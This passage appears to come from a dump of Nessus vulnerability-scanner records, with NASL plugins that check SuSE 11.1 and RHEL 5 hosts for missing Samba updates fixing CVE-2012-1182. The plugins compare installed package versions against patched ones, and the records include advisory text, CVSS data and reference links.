Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58764);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"SuSE 11.1 Security Update : Samba (SAT Patch Number 6124)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size\n values which allows attackers to write beyond the\n allocated array size. (CVE-2012-1182)\n\nAlso the following bugs have been fixed :\n\n - Samba printer name marshalling problems. (bnc#722663)\n\n - mount.cifs: properly update mtab during remount.\n (bnc#747906)\n\n - s3: compile IDL files in autogen, some configure tests\n need this.\n\n - Fix incorrect types in the full audit VFS module. Add\n null terminators to audit log enums. (bnc#742885)\n\n - Do not map POSIX execute permission to Windows\n FILE_READ_ATTRIBUTES; (bso#8631);. 
(bnc#732572)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=732572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=742885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=747906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1182.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6124.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:cifs-mount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ldapsmb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:libtalloc1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libtalloc1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libtdb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libtdb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-krb-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"cifs-mount-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libsmbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libtalloc1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libtdb1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libwbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-client-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-doc-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-krb-printing-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-winbind-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"cifs-mount-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libsmbclient0-3.4.3-1.38.1\")) 
flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtalloc1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtalloc1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtdb1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtdb1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-client-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-client-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-doc-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-krb-printing-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-winbind-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"cifs-mount-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"ldapsmb-1.34b-11.28.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libsmbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libtalloc1-3.4.3-1.38.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:1, reference:\"libtdb1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libwbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-client-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-doc-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-krb-printing-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-winbind-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libsmbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libtalloc1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libtdb1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libwbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"samba-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"samba-client-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"samba-winbind-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libtalloc1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libtdb1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"samba-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, 
cpu:\"x86_64\", reference:\"samba-client-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.4.3-1.38.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:43", "description": "Updated samba3x packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. 
After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "RHEL 5 : samba3x (RHSA-2012:0466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:samba3x", "p-cpe:/a:redhat:enterprise_linux:samba3x-client", "p-cpe:/a:redhat:enterprise_linux:samba3x-common", "p-cpe:/a:redhat:enterprise_linux:samba3x-doc", "p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui", "p-cpe:/a:redhat:enterprise_linux:samba3x-swat", "p-cpe:/a:redhat:enterprise_linux:samba3x-winbind", "p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.6"], "id": "REDHAT-RHSA-2012-0466.NASL", "href": "https://www.tenable.com/plugins/nessus/58673", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0466. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58673);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0466\");\n\n script_name(english:\"RHEL 5 : samba3x (RHSA-2012:0466)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6\nExtended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0466\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-client-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == 
\"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-client-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-client-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-common-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-common-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-common-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", 
reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba3x-winbind-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba3x-winbind-devel-3.5.4-0.70.el5_6.2\")) flag++; }\n 
else { if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:03", "description": "From Red Hat Security Advisory 2012:0466 :\n\nUpdated samba3x packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. 
